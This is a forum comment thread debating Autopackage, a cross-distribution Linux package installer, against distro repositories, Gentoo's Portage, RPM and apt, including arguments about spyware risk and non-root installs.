How about a "package" where you double-click and it does the compile for you?

Re:Wrong Paradigm

[juhaz]

None of the security problems on Windows comes from the overall method of software distribution.

The ENTIRE problem with spyware and other malware comes from malicious WEB SITES and also from people downloading pointless, stupid little "free" programs from COMMERCIAL entities. If users were made more aware of the legitimate freeware sites where much better freeware was available, they would be less inclined to download anything they see thrust at them.

You're contradicting yourself, if and when the overall method of software distribution on windows encourages users to search software from arbitrary web sites, some of which CAN AND WILL be malicious, there's clearly some kind of problem in it.

As for user education, sorry to ruin your day, but it is impossible, there will NEVER be a day without clueless users, so some kind of additional safeguards need to be deployed.

None of the security ease of Linux comes from having distros distribute the software. It comes ENTIRELY from the fact that OSS is not commercial and has no motivation to install spyware.

You're right in that Linux currently doesn't have enough commercial players and the malware they bring in with, but should it ever become popular on desktop, they WILL follow. And if that day comes, the distros can certainly help.

Think distros as your "recognized freeware sites" - they do exactly the same job, they screen the shoftware, and pick only what's good to distribute. But since they also double as the very distribution method and not just repository, assuming good enough selection, users will grow content with installing packages only from distro, and barrier for getting stuff from arbitrary, possibly malicious, web sites will heighten. It won't prevent the idiot from installing spyware from the web, but it will make it less likely to happen, just because most of the time there's no need to do that.

Re:Wrong Paradigm

[k8to]

Well, no.

Normally, my package maintainer gets the code from Trustworthy Tim by hand, inspects it by hand, cryptographically signs it by hand, and uploads it him/herself to the package repository where it is centrally managed without access from Evil Edward.

Autopackage provides a way for me to automate the setup and install, right? or wrong? If the autopackage automates dependencies, then it's an attack vector for spyware. If it doesn't automate dependencies, then it doesn't meet the described criteria for helping users.

Re:Wrong Paradigm

[k8to]

But you said you needed distributed key signing in order to make authentication work in the distributed model.

Is autopackage distributed? I thought it was.

Re:Wrong Paradigm

[Master+of+Transhuman]

"if and when the overall method of software distribution on windows encourages users to search software from arbitrary web sites, some of which CAN AND WILL be malicious, there's clearly some kind of problem in it."

Encouraging users to search software from arbitrary Web sites is exactly how it is done now - and the ONLY users who are negatively affected are those who: 1) download from disreputable commercial sites; 2)don't run anti-malware programs - which should be built into the OS by now, but the industry is obviously too stupid - and 3) are too stupid to read the EULAS occasionally presented by spyware utilities.

The ONLY technological way to solve this problem is to embed software in the OS that does not allow ANY communication with the Net - in or out - unless the OS ITSELF explains IN DETAIL exactly WHICH program is trying to communicate and WHY, so that the user can make an INFORMED choice on allowing communication. In fact, the OS should not allow any program other than itself to run until the exact same situation occurs. "Trusted computing" is an excellent idea - provided, of course, that it is under the control of the user, instead of under the control of Gates and the RIAA.

The problem at the base is STUPID OS design.

However, MY point still stands - anybody who has a clue will NOT be affected by software brought down from the Web - and the clueless will continue to be affected no matter whether they get software from a distro or not.

You think EVERY DISTRO can be trusted NOT to install spyware or trojans? How many distros are there? Do YOU know who is behind each and every one? Especially when, as you say, Linux reaches some critical mass? If you think spyware authors and software and Web site authors will collaborate to install malware on users when Linux is bigger, how do you know the DISTROS won't? Do you trust SUN? I didn't think so.

Besides, I have NEVER said that the distros CANNOT function as useful distributors. The problem with people bringing up this horseshit about packages is that they are treating the whole thing as an "either-or" situation - which there is absolutely NO evidence that will ever occur. Some software authors will continue to distribute their software through distro repositories, some will use packages, some will use both. There is NO confict between the two, and to suggest otherwise is hypothetical nonsense. When it happens, you can complain. Until then, it's just resistance to a new idea. Period.

Re:nextgen already here: emerge

[ArbitraryConstant]

Developers want to be able to release packages that work on all the Linuxes, not just Gentoo. Not everyone wants to make the fast updates/reliability tradeoff necessary to use Gentoo.

Mirror

[anandpur]

Autopackage

Installation for Windows

[karmaflux]

Right, installing shit is great on Windows. The suicide hotlines start overloading when you try to remove software.

For more information on autopackage...

[mp3phish]

I have been following autopackage for a while now.. It looks promising. This release will be the test to see if anybody will take it seriously (I hope so). Autopackage brings some really cool features to the table:

• Frontends to different windowing and desktop systems.
• Able to resolve dependancies even if you installed other software through the source, or with RPM or DEB
• You will be able to download one package and install it on several different distributions.

Essentially, this will be as flexible as tarballs, only they will install easilly, and have clean upgrade paths and uninstall paths. With clean dependancy resolution. It sounds too good to be true, but you can only know it if you try it.

Here is the sourceforge link with some more info and downloading.

Re:nextgen already here: emerge

[jay-be-em]

Yeah, because everyone wants to wait 8 hours for gnome to compile.

Give me a fucking break.

This is a great thing for Linux

[TheMadPenguin]

Seriously. I had envisioned something similar last year but this really takes the cake, or so to speak. I have yet to try Autopackage, but after seeing this, I'm sold. Especially if it works as intended. Cross-distro package management is what we need. Sure, DEB, RPM, TGZ, etc etc are all excellent in their own right, but being able to install packages across multiple distros is what we really need. I for one am impressed. Of course there are a few technical details that I need to learn about as far as cross-distro packaging goes, but it's a step in the right direction in any event.

Mirrordot got it!

[djsmiley]

http://mirrordot.org/stories/5f34bd546afaa065409b5 e4822a1ed01/index.html

Re:Mirrordot got it!

What's so hard about making it into clickable text?

Re:Mirrordot got it!

He obviously does not understand even basic HTML. Par for the course on slashdot.

Re:Mirrordot got it!

[djsmiley]

hey, in this day and age with all this UTF-8 errors causing people to look 3times at that url they clicked and having microsoft telling us NOT to use Hypertext links, what is the point OF making it clickable?

Least everyone knows where mine points to =]

DIE FANBOY MODS

Official Gentoo-Linux-Zealot translator-o-matic

Gentoo Linux is an interesting new distribution with some great features. Unfortunately, it has attracted a large number of clueless wannabes who absolutely MUST advocate Gentoo at every opportunity. Let's look at the language of these zealots, and find out what it really means...

"Gentoo makes me so much more productive."
"Although I can't use the box at the moment because it's compiling something, as it will be for the next five days, it gives me more time to check out the latest USE flags and potentially unstable optimisation settings."

"Gentoo is more in the spirit of open source!"
"Apart from Hello World in Pascal at school, I've never written a single program in my life or contributed to an open source project, yet staring at endless streams of GCC output whizzing by somehow helps me contribute to international freedom."

"I use Gentoo because it's more like the BSDs."
"Last month I tried to install FreeBSD on a well-supported machine, but the text-based installer scared me off. I've never used a BSD, but the guys on Slashdot say that it's l33t though, so surely I must be for using Gentoo."

"Heh, my system is soooo much faster after installing Gentoo."
"I've spent hours recompiling Fetchmail, X-Chat, gEdit and thousands of other programs which spend 99% of their time waiting for user input. Even though only the kernel and glibc make a significant difference with optimisations, and RPMs and .debs can be rebuilt with a handful of commands, my box MUST be faster. It's nothing to do with the fact that I've disabled all startup services and I'm running BlackBox instead of GNOME or KDE."

"...my Gentoo Linux workstation..."
"...my overclocked AMD eMachines box from PC World, and apart from the third-grade made-to-break components and dodgy fan..."

"You Red Hat guys must get sick of dependency hell..."
"I'm too stupid to understand that circular dependencies can be resolved by specifying BOTH .rpms together on the command line, and that problems hardly ever occur if one uses proper Red Hat packages instead of mixing SuSE, Mandrake and Joe's Linux packages together (which the system wasn't designed for)."

"All the other distros are soooo out of date."
"Constantly upgrading to the latest bleeding-edge untested software makes me more productive. Never mind the extensive testing and patching that Debian and Red Hat perform on their packages; I've just emerged the latest GNOME beta snapshot and compiled with -09 -fomit-instructions, and it only crashes once every few hours."

"Let's face it, Gentoo is the future."
"OK, so no serious business is going to even consider Gentoo in the near future, and even with proper support and QA in place, it'll still eat up far too much of a company's valuable time. But this guy I met on #animepr0n is now using it, so it must be growing!"

Re:DIE FANBOY MODS

hahaha

so true

Re:DIE FANBOY MODS

I would like to make an addition here:

"Gentoo is so much more secure."

"Despite a lack of security-only updates, thus guaranteeing Gentoo's unusability for any serious production deployments, I am more secure because I just upgrade to the newest packages when I have to. Never mind that constant upgrading makes my box less stable; backporting security updates to known stable packages is against the spirit of, er, something."

Re:DIE FANBOY MODS

[OrangeTide]

"I use Gentoo because it's more like the BSDs."
"Last month I tried to install FreeBSD on a well-supported machine, but the text-based installer scared me off. I've never used a BSD, but the guys on Slashdot say that it's l33t though, so surely I must be for using Gentoo."

Actually Gentoo's "installer" is called tar and a complex series of bash commands. So I can't imagine a Gentoo user being scared off by FreeBSD's easy to use installer. Unless they are a masochist.

Re:DIE FANBOY MODS

[voisine]

Yeah, I've been a FreeBSD guy for some years now, but was force to use Linux when I got an amd64 box, due to Nvidia's failure to release amd64 FreeBSD drivers. After suffering thought the nightmare that was the total lack of a gentoo installer once, I decided to try out vidalinux. Ahh... anaconda installer, BSDlike ports collection, linux hardware support. As soon as Nvidia releases amd64 drivers for FreeBSD, I'm going back though. Managing use variables and figuring out what's marked stable that's not and and what's marked unstable that is, sux.

Re:DIE FANBOY MODS

I don't run Linux to feed my ego or whatever, I run it to get some fucking work done. I use SuSE because it works for me. I spent an hour doing the install, it works with all my hardware, I get my work done and get to have a life.

Okay, that last bit's a lie -- I don't really have a life at present, I just have time to get more work done, but at least it gets done and eventually I'll get to have a life when I get caught up. And I won't be spending it recompiling everything including the kitchen sink 2-3x/week in order to try to look l33t.

So use whatever distro lets you get your work done and maybe have a life. And quit wasting mine telling me how fabulous yours is because it takes up all of yours, okay? This *especially* goes for members of the Cult of Gentoo. Thanks!

I think autopackage rocks because I don't spend hours looking for a SuSE-compatible RPM or tracking down libs so I can compile something I need that SuSE won't have until the next version. I've also used some autopackages on my Fedora and Mandrake machines and the same holds true there. Download, make executable, run -- computer, meet software. Me, meet getting back to work.

P.S. I just modded down several Gentoo fanbois using another account on another box. And thus, balance is restored. :)

Re:DIE FANBOY MODS

[iezhy]

messed up moderation stats:

Moderation +5
60% Funny
10% Troll
10% Redundant
Extra 'Funny' Modifier 0 (Edit)
Total Score: 5

Re:DIE FANBOY MODS

[OrangeTide]

Gentoo users just accept that it's all marked unstable. Running just the stable option in gentoo gets you a bunch of old unstable stuff instead of new unstable stuff. And yea, the USE flags are annoying because they aren't unified very well between all packages. the ufed program helps in setting them though.

Please let non-root people install

The only thing I'd like to see in a package manager is to allow non-root users to install software (perhaps under $HOME ; perhaps under /usr/local if they're members of the group local).

It's absurd that you need to enter a root password to do something as simple as install a user-space program - and it's absurd that package mangers only support dependancy checking for stuff installed in the main system directories.

At work, the main directories (/usr, /bin, etc) can only be accessed by the IT guys; but every department has a directory ("/usr/department/engineering", for example) of that memebers of that group can install software in. We have a newer version of Perl in ours. It really sucks that package managers can't help deal with the dependancies in an environmennt like this.

Re:Please let non-root people install

[Dave2+Wickham]

Non-root installs are easily done in autopackage.

Re:Please let non-root people install

[stefanlasiewski]

The only thing I'd like to see in a package manager is to allow non-root users to install software

Check out the Flash demo. They actually demonstrate that capability-- the application installs packages under $HOME/.local/lib $HOME/.local/share, etc. I dislike cluttering $HOME with $HOME/lib, $HOME/share, $HOME/man, etc. -- installing these pieces under a dot directory to keep them hidden & organized is a great idea.

But I am also curious about allowing groups to install software under /usr/local or /usr/department .

Re:Please let non-root people install

[hawk]

Err, are there really package systems that *don't* let you do this?

Under the FreeBSD ports system, you simply set $PREFIX to wherever you want things to happen. While this is probably not obvious to grandma, it would just come to a script to

1) add $HOME/.programs to the relevant paths
2) add the "mypackage" script to $HOME/.programs/bin which sets $PREFIX and passess the rest of the argments.

It's been a few years since I've used dpkg, but I'm pretty sure that it had similar options, and I always assumed that rpms could do something similar.

hawk

Re:Please let non-root people install

[delire]

again, see http://0install.net/ for a good solution to this. Quite brilliant.

Re:Please let non-root people install

[Minna+Kirai]

Under the FreeBSD ports system, you simply set $PREFIX to wherever you want things to happen.

It would be better if homedir installation happened by default whenever a non-root user attempted an install. Instead, BSD ports will go download and compile everything, then request the root password later, wasting the user's time if she doesn't have the admin around.

It's been a few years since I've used dpkg, but I'm pretty sure that it had similar options, and I always assumed that rpms could do something similar.

Neither dpkg or rpm is a packaging system. There are a packaging systems like "apt" and "yum", which use either dpkg or rpm internally (in the same way that ports uses "make" internally), but I am not aware of a way to have them install in home directories.

Re:Please let non-root people install

[Davoid]

I agree... sort of. I have no problem with non-root users being able to install software anywhere where they have permissions to do so, such as in their home folder. It would also be nice if the PM allowed the other dependencies, if any, to be installed.

However, for other than the individual account, systemwide or even groupwide software install by anyone is a very bad idea. If you really need groupwide software installed there should be a groupadmin, not neccessarilly root, for installing the groupwide packages.

In my opinion and experience any other system will rapidly become a security nightmare.

-DU-...etc...

Re:Please let non-root people install

[mattdm]

You can do this with some RPMs, but unfortunately, much software has hard-coded expectations for file locations (config and data files are typical examples). It's hard to make this flexible without actually recompiling at package install time. (Which has its own various downsides, of course.)

Re:Please let non-root people install

[ajs]

The only thing I'd like to see in a package manager is to allow non-root users to install software

Check out the Flash demo. They actually demonstrate that capability-- the application installs packages under $HOME/.local/lib $HOME/.local/share, etc. I dislike cluttering $HOME with $HOME/lib, $HOME/share, $HOME/man, etc. -- installing these pieces under a dot directory to keep them hidden & organized is a great idea.

Also consider checking out this new tool called RPM. It's pretty slick, and although (based on the chatter here) no one has heard about it yet, it's pretty snazzy.

It includes post-installation and removal logic, non-root usage, installed package validation and many other features that people find useful.

The autopackage folks keep saying that autopackage isn't aimed at the same jobs as RPM, but what I'm getting is that it's aimed at jobs that they didn't think RPM could do... but it can, does and does well.

There are also several automatic RPM generators, though I usually find that only the domain-specific ones are worth the trouble (e.g. the CPAN RPMifiers). All of the others work great for the first day or week... right up until a package changes its dependency graph in an update, and suddenly conflicts with your auto-generated dependency graph.

There are two rules here:

Dependency management is hard

Making it easy is harder

In general, you end up wanting a human to directly manage dependencies, as a part of release engineering. If you don't have a release engineering step, then a spiffy package creator isn't going to solve your real problems.

Re:Please let non-root people install

[jnf]

Yes I do believe I've heard of this 'rpm' thing, if I remember correct it all worked fine and dandy until 1 thing got installed from source or similar, and then it became a --nodeps hell.

Re:Please let non-root people install

Hey buddy, lose the fucking snot-nosed additude? He made a good point.

People like you are a major reason why OSS has such a hard time getting adopted in the office. Techies who are socially apt are a rare breed.

It brings me great joy when I fire people like you. LEARN SOME SOCIAL SKILLS.

Re:Please let non-root people install

[ajs]

lose the fucking snot-nosed additude [...] LEARN SOME SOCIAL SKILLS

'Nuff said.

Re:Please let non-root people install

[ajs]

"Yes I do believe I've heard of this 'rpm' thing, if I remember correct it all worked fine and dandy until 1 thing got installed from source or similar, and then it became a --nodeps hell."

This is akin to saying that everything works fine when using a hammer, right up until you buy glass nails. Simple solution: don't buy glass nails.

More to the point, if you have source for something, make an SRPM out of it, and install. If *that* were what this auto-packager did, it would be a wonderful tool. There are certianly many steps in the production of an SRPM which could easily be automated (detect common configuration tools, determine best way to find dependencies, etc.)

They could have even achieved their goal of cross-platform usefulness by making the RPM back-end modular so that DEB or Gentoo ports could be generated as well. Instead they came up with their own dependency tracker which is incompatible with the standard one used by the system.

Back to your point: When you start using --nodeps with RPM, you've already lost. I've been working with RPM for 5 years with packages local and standard, and have never had to force an installation without dependency resolution. It's all about knowing your tools. If you don't know your tools, then no fancy front-end is ever going to help you.

Re:Please let non-root people install

[Merk]

Well, the flash demo shows exactly that for Autopackage.

What I want is similar, but also radically different. I want to be able to install system packages without using the root password. I want these GUI installers to know about "sudo" not just "su".

If I'm in the 'wheel' group, and sudoers is set up properly, I should be able to do all sysadmin tasks as me, knowing only my password, not the root password. That mostly works on my system now, until I use a GUI program, which insists on knowing my *root* password. Why!?

Re:Please let non-root people install

[jnf]

More to the point, if you have source for something, make an SRPM out of it,
Well a source package was just one example, I've run across several similar instances- perhaps the correct answer is 'how about a plain text database or a program to edit the database', for instance I've run across instances where the database name isn't exactly what another program expected (it had a release name or similar added onto the provides line). Now of course you can edit the spec file and rebuild, but if I'm gonna do that, im gonna throw the crappy package manager away as well (yes I'm refering to rpm's). I've been maintaining our internal rpm's and yum repositories for quite some time now, and i still think it is horrible design.

Re:Please let non-root people install

[webhat]

True enough, generally with rpm's I just end up cpio'ing the package into my homedir.

mkdir tmp
cd tmp
rpm2cpio rpmfile | cpio -i

Autopackage Rocks

This project is essential for Linux's adoption and that's why I hope many distributions will ship with it. It's fantastic!

It does not scale.

[JPriest]

The idea of storing all software on repositories does make dependencies easier to manage but could you imagine doing it that way in Windows? You have all the overhead of having to centrally locate ALL software on a mirror somewhere. Anytime you as a software developer want to release software, you have to try to get it pushed out to all the mirrors (which you have no control over) in order for people to access it. This idea is also not very friendly to closed source projects.

Re:It does not scale.

[ZephyrXero]

It's not friendly to any project, closed or open...that's why Autopackage is such a great idea :)

Re:It does not scale.

[St.+Arbirix]

Anytime you as a software developer want to release software, you have to try to get it pushed out to all the mirrors (which you have no control over) in order for people to access it.

This is why Gentoo developers don't consider you an official mirror unless they have complete control over the machine. Here's the list of sites that don't mind that. Also, very few packages in the portage tree are as big as the Windows service packs. The network bandwidth involved with keeping Gentoo up to date is comparable to keeping Windows up to date, even counting all the little things.

Re:It does not scale.

[JPriest]

Like Photoshop, Dreamweaver, and Counter Strike? What about all the little-known applications I use that few if any people seem to know about? Even some of the more known GPL apps I use can never seem to be found on package mirrors.

Re:It does not scale.

[roadrunnerro]

Actually something like that is happening with freeware/shareware right now - usually just upload you .pad file and you're set - see tucows.com, softpedia.com ...

Re:It does not scale.

[ZephyrXero]

Up until recently, it was almost impossible to get this little program called Nvu on Gentoo (using standard portage tree, not overlays). They finally updated it to the new version 0.9 recently, but they just had version 0.6 (huge difference) for quite a while there... This is why I hate relying on my distro for all my software I want to run on their OS.

Re:It does not scale.

[51mon]

Mirrors are so very 1990's, you've been able to get debs off several different scalable peer to peer networks for years.

I don't get debs that way, but sharing files is a solved problem, ask the RIAA.

Sure sharing packages is unfriendly to closed source software, but they are inherently at a disadvantage when it comes to distributing software.

Be like OSX

Maybe this packaging system works this way (I can't rtfm so I don't know), but one of the things that is easier in OSX than in Linux (especially for the newbie) is that installing software is usually as simple as dragging the application (which is actually a directory containing all of the application's files) to your "Applications" folder (or where-ever else you want to put it).

I do like apt as well, but I've also had some apt-nightmares trying to sort out messed-up dependancies on my debian box.

Re:Be like OSX

[MsGeek]

Here's how you fix dependencies in Debian:

#apt-get update
#apt-get dist-upgrade

Badabingbadabangbadaboom. It's done. Happy days are here again.

Re:Be like OSX

[GoldDog]

hahahahahaahhahahaha
hahaha
hahahahahahaha *gasp* HAAAAAAAAAHHAHAHa

Now Debian is my favourite distro by far but I'm never gonna pretend that the package system is solid. Having way to many times been in the position where some little thing breaks and dpkg and apt just choke totally (to the point where I can't install something because I some package is broken and I can't uninstall that package because the damned uninstall-script needs something installed first).

The long and short of it is No, that's not how you "fix" dependencies in Debian. A lot of editing obscure files, handrolling temp replacement packages and so much swearing I need to put a parental advisory sticker outside my appartment is.

Re:Be like OSX

[IamTheRealMike]

That assumes the dependencies are in Debian, aren't broken (eg, unstable/experimental sometimes contain uninstallable packages) and so on.

What the gp is asking for is something like this, I think.

All kinds of UIs become possible once you have the infrastructure in place. Apt-get "name that package" type UIs are of course very handy when you know what it is you want, and NeXT style appfolders are also quite convenient when browsing around. We can support all of them, if we want.

Re:Be like OSX

However I have noticed issues with the osx's 'packaging system' in that there is not any. Removing the application from /Applications or ~/Applications, does not remove log files, config files, or other assorted data. Hense the reasoning behind dpkg/deb and rpm to begin with.

Re:Be like OSX

[sarastro_us]

Ever try upgrading Gnome using apt-get? Guess not...

Re:Be like OSX

[51mon]

Will people stop saying dependencies in "unstable" are sometimes broken, or "unstable" breaks - this is precisely why it is called "unstable". Precisely why my desktop has "testing" on currently.

Sure Debians packaging system isn't perfect, but it is probably the best software packaging system in widespread use in terms of handling dependencies.

Most of the cases presented as problems encountered have simple solutions in "apt" is you know what you are doing (or have read the Debian reference), and if you are troubleshooting installation problems in computer configuration you should know what you are doing, otherwise reinstall and stop wasting your lives.

Re:Be like OSX

[sparkz]

Or - in summary - installing software is not trivial.

Why is this not f*cking obvious?

What do you expect to get paid for? The occasional "apt-get" doesn't exactly demand a high salary; installing the right software, correctly, is a valuable contribution.

Ho Hum.

Re:Be like OSX

[51mon]

"Ever try upgrading Gnome using apt-get? Guess not..."

Urm yes I've done this several times, it has always just worked, I'm not quite sure what your point is?

Re:Be like OSX

[binford2k]

I upgraded gnome from pre-1.0 all the way to 2.6 along with the rest of the system. What's the problem?

Re:Be like OSX

[sarastro_us]

Every time Ive tried to apt-get dist-upgrade, Gnome has ended up broken. Ive talked to several other people who've had the same trouble. Don't know why... It's the only real problem Ive ever had with apt-get.

Re:nextgen already here: emerge

[Screaming+Lunatic]

Yeah, because everyone wants to wait 8 hours for gnome to compile.

Portage can work with binaries. The package to be installed can be source, binary, or your grand-daddy's p0rn. Portage is a bunch of python scripts that make dependency checking and package distribution easy. Your package being source is not a strict precondition.

Regards.

I don't know about this

[theantix]

To me it seems like anything that makes it easy for users to install random software off the internet to be a REALLY BAD THING. Using Linux right now is a pleasure because if you're using Gentoo, Ubuntu, Fedora, Mandrake, etc... you get all your software packaged for you by your distribution. No spymare, no viruses, so adware, no shareware. It all generally works, dependancies are sorted out and managed, it's all a really good system.

Encouraging users to install Comet Cursors for Linux seems to me like a huge step backwards for Linux. I sincerely hope that distributions do not support this or any other system like this one to promote good computing practises and avoid the sorts of problems that plague Windows users. Why do we want to emulate what has been proven to be a terrible way of distributing and using software?

Re:I don't know about this

[TheSunborn]

But what do you do if the software you need are not included with you distro?

Re:I don't know about this

[theantix]

There is no software I need that is not included with my distro. And even if there was, the process should be difficult enough for me to really examine the question of if I really ought to be installing the system. To rephrase: installing stray software off the internet is a task that computer users have repeatedly proven to not be able to make wisely. How many times do you have to wipe and reinstall your family/coworker/etc and they STILL keep installing every stupid malware-ridden executable they can get their grubby little hands on?

The point is, the decision to install stray software onto your machine should not be made lightly. Making the process easier for end users will inevitably lead to poor choices being made and Linux users will suffer from the same problems that plague Windows users. Your distribution already packages all the software you "need", and making software you "want" but isn't packaged ought to be serious decision. This may sound elitist of me, but if you can't figure out how to do it now, you probably aren't capable of making that sort of decision.

Re:I don't know about this

[ultrabot]

To me it seems like anything that makes it easy for users to install random software off the internet to be a REALLY BAD THING

I think they can create a "special edition" of the software, that requires you to type "all hail the emperor TUX, of which much software floweth" every time you are trying to install something. Then it's just doable, but not excessively convenient.

Re:I don't know about this

[Directrix1]

You have to trust the software makers no matter what. Technically, this reduces the number of people you have to trust to just the developers, not the developers and packagers.

Re:I don't know about this

There is no software I need that is not included with my distro.

Hooray! Linux is done! On to Duke Numem Forever!

Re:I don't know about this

[TuringTest]

Autopackage is still useful por people who *know* how to use software that is not packaged in the distro. Didnt you read the bit in the FAQ about the writer making their own packages? I would love to have a program doing all the dependency checks for me when I want to install Beagle, or X.org, or any other beta software that is not yet packaged.

Re:I don't know about this

[DoraLives]

Encouraging users to install Comet Cursors for Linux seems to me like a huge step backwards for Linux.

Well, in the Department of Silver Linings, it's looking like continued positive cash flow for the folks who ungum boxes for a living.

Re:I don't know about this

[man_of_mr_e]

Why get a different distro, of course.

While I am joking, I know there are a lot of people that do this, and a lot of people that recommend it.

Re:I don't know about this

[Master+of+Transhuman]

"To me it seems like anything that makes it easy for users to install random software off the internet to be a REALLY BAD THING."

This is hardly the point of the project.

The point of the project is to eliminate problems for developers in packaging their software to be able to run across distros.

The fact that it makes it easier to relieve dependency hell is a bonus for those users who want packages not included in their distro.

Anybody who says EVERYTHING they'll ever need is included in their distro is just being a troll. Because it simply is not possible that ANY distro is "finished." And a lot of people don't want to wait months until something they want shows up in a repository.

If Windows did that, everybody would still be using DOS.

Finally, the notion that it is somehow "evil" to install software from the Net is just stupid. The Net exists to distribute information - and programs are part of that.

Practically everything I use on the Windows side of my machine was downloaded off some Web site or another - and I have several gigs of stuff on my Linux side to explore yet which also has the same origin.

And I have NEVER had a spyware/virus/trojan problem from such software. (Although I have had software that simply screwed up the machine due to stupid programming.)

Users get spyware and other crap from stupid, pointless little programs offered by commercial entities because the user acts like a kid in a candy store when offered something "free". If the users really knew what freeware was about and where to get anything they need, they would be less likely to do stupid stuff like downloading a calendar program loaded with spyware.

While it is true that CORPORATE users should be restricted from downloading any damn thing they see (unless it has a productivity purpose), home users certainly should not be.

Your solution smacks of the paternalism I hate about Windows. You want your distro to control your machine just as much as Gates wants to control Windows users.

Sorry - not acceptable.

Re:I don't know about this

[Master+of+Transhuman]

Yeah, right - and allowing people choices like who they should screw is also not to be made lightly - so I guess you want to control that, too?

So you want to eliminate MY ability to decide what software to install by restricting the availability of software to stuff YOU approve of.

Pardon me, but fuck you, homes. That is entirely against the spirit of open source. What part of Stallman's "freedom" don't you comprehend?

Re:I don't know about this

[nofx_3]

Maybe my system is just weird, but usually ./configure will check deps for me and I'll never get a make file if I don't have the needed stuff. If ./configure craps out *most* libs and such are avialable from my distro so I just (insert apt-get, emerge, pacman, rpm, slapt-get here) the library and run ./configure again. what I think autopackage would be good for is installing commercial and non OSS apps in your home dir and preventing them from messing with / breaking your system.

-kaplanfx

Re:I don't know about this

[imkonen]

" There is no software I need that is not included with my distro"

Sorry if this sounds insulting, but your attitude seems really narrow-minded and short sighted. The whole reason the computer is such an incredibly useful tool is that it is so flexible and extendable. YOU might manage to get everything you need out of the software included in your distro, but do you really expect the big distros to anticipate every single need of every single user? A lot of people who are not computer experts have specific application needs that the vast majority of users don't share. Should a good distro include a version of GAMESS just because I want to do a theoretical chemistry calculation? Or maybe the people who make distros should assume (correctly) that if I am one of the .0001% of computer users who would want to use that program, I should just go download it myself?

"This may sound elitist of me, but if you can't figure out how to do it now, you probably aren't capable of making that sort of decision."

Yes, you sound incredibly elitist, as if it is impossible to be smart and NOT a computer expert. There is a big difference between knowing enough about one's Linux distro to install a program and having enough common sense to find programs on the internet with minimal risk of installing malware. If I google search for software that simulates microwave spectra of asymmetric top molecules (and by the way there are quite a few) what are the odds I'm going to find spyware masking itself as what I'm looking for?

Re:I don't know about this

[loraksus]

There is no software I need that is not included with my distro. And even if there was, the process should be difficult enough for me to really examine the question of if I really ought to be installing the system.

And I think you've just about summed up the "Why Linux will never be used on the desktop until attitudes change" argument. Next time, try mentioning how man pages, faqs and documentation in general should be written so that the new user has to jump through a series of hoops (something simple, find the factors of a 4000 digit number or something) in order to discover how to get something working.

Re:I don't know about this

[theantix]

Uh, I'm just saying that the Linux community ought to learn from the mistakes of the proprietary software community instead of going along for the ride. I don't care what you do or don't do -- if you want to be able to install Comet Cursors for Linux be my fucking guest, "homes". What I do know is that if you make it easy for unknowledgable users to install software, they will destroy their Linux machines just as they destroy their Windows machines on a fairly regular basis. If you actually know what you're doing you don't _need_ Autopackage... compiling from source is a fairly trivial task for a moderately experienced user. The people who "need" it are unfortunately the ones who really ought to not be installing software from stray internet sources at all.

Re:I don't know about this

[Weirdofreak]

Trivial it may be, but about a year ago I was using a crappy machine with 70 odd megs of RAM. I did try compiling stuff from source. Honest. I decided that I didn't like it after the Gimp. I'm lucky (and so was my late computer) that I didn't run into any dependency issues. Anybody who wants to force me to build stuff from source if I can't get it from my distro gets the finger. Nowadays I mainly build stuff from source anyway, but that's my decision and I can easily reverse it out of spite.

If people screw their machines up, it's their problem. If you get caught up reinstalling for them, you can easily get out of it by telling them no. Banning rope won't prevent suicide, it'll just piss off the rock climbers. On the other hand, people won't (often) commit suicide if they think death is worse than life, so if you refuse to help dead people, they might learn and stop killing themselves. Those that don't will eventually give up and use a hammer, thus stopping them from infecting others. Natural selection, however bad my analagies might be.

Re:I don't know about this

I don't think users should be given this kind of power; something like this causes us much headache because we use a shared (nfs) home for multiple users without (till now) implementing disc quotas. A single firefox install doesn't hurt, however 20 do and if someone makes a 'workstation install' of staroffice it causes my boss to screech with his nails in a most unpleasent way...

If anything like autopackage becomes mainstream, we will see the same problems firefox has with untrusted extensions. Some people will start to create trojaned packages. Any user should check md5sums (or better gpg signatures) before installing (as packagers hopefully do now); we will need some infrastructure for this, just having a webpage with the correct fingerprints somewhere is not good enough.

About the 'not everything in distro' argument:
About what kind of user are we talking about? Someone who does understand the power of a text-editor? The shell? Afraid of gcc output? Able to hack a makefile? What about configure.in?
Or someone who commonly doesn't venture beyond the start-menu or desktop icons?
Does the latter person care about program foo fork bar linked against libuncommon? If yes, there are probably three solutions:
* learn (the hard way)
* find someone who packages for your distro
* pay someone to do it *for you*

Before I forget it: shifting the burden of maintenance to the developers won't work, they simply won't accept it; neither will (the average / most) user(s). The field (I dare say 'art') of packaging exists for that very reason.
If you can't live w/o daily cvs (no, at least svn;-) checkouts, *you* decided to play it hard. I don't think many users really want this; but who am I to stand in their way.

Re:I don't know about this

[TuringTest]

Does ./configure also download and install all the recursively unmet dependencies?

I thought so.

Re:I don't know about this

[Minna+Kirai]

Uh, I'm just saying that the Linux community ought to learn from the mistakes of the proprietary software community instead of going along for the ride.

No, you aren't saying that. You are advocating Linux follow Microsoft's example.

Autopackage is 100% against how the proprietary software world works. In proprietary software (which basically means "Microsoft Windows software"), there is no such thing as a package manager, a package format, or dependency analysis. There are no "packages", just "installers", which are completely arbitrary programs that users execute to (hopefully) install something, but which might be doing anything else.

Re:I don't know about this

[Trogre]

Yes, it is very easy to adapt an, "if I can't apt-get it, I don't want it" attitude, especially when you first become aware of the plethora of software available in the various Debian and Fedora archives.

Of course, you are somewhat at the mercy of the whims of package maintainers (who are not necessarily always the software maintainers).

Re:I don't know about this

[idlake]

YOU might manage to get everything you need out of the software included in your distro, but do you really expect the big distros to anticipate every single need of every single user?

The way it works out in practice on Debian is that, for most people, once it's mature enough to be included in the distro, it's part of the distro. Until then, you probably want to install it from source anyway, which is an option you always have.

Should a good distro include a version of GAMESS just because I want to do a theoretical chemistry calculation?

Yes. More accurately, someone should become a binary package maintainer for each distribution. As part of that, that person has to assume responsibility for not breaking anything in the distro. Creating an "Autopackage" and pretending that that solves the integration problems "automatically" just isn't going to do the trick; you might as well only distribute the sources.

Re:I don't know about this

[nofx_3]

my point was that you will typically want to use your distro to install much of the dependencies (i.e. libs) so that if you install something with say apt-get that also depends on the library it will not download a conflicting version. I was only commenting on autopackge, which does not recursively install unmet dependencies as far as I can tell from the homepage.

-kaplanfx

Re:I don't know about this

[MobyTurbo]

There is a big difference between knowing enough about one's Linux distro to install a program and having enough common sense to find programs on the internet with minimal risk of installing malware.

Malware is pretty rare in the Linux world due to the more secure design of Unix. In general anything you download from freshmeat.net, for example, is safe. However, getting it to compile if you don't have the correct dependencies installed can be an adventure. :-)

Re:I don't know about this

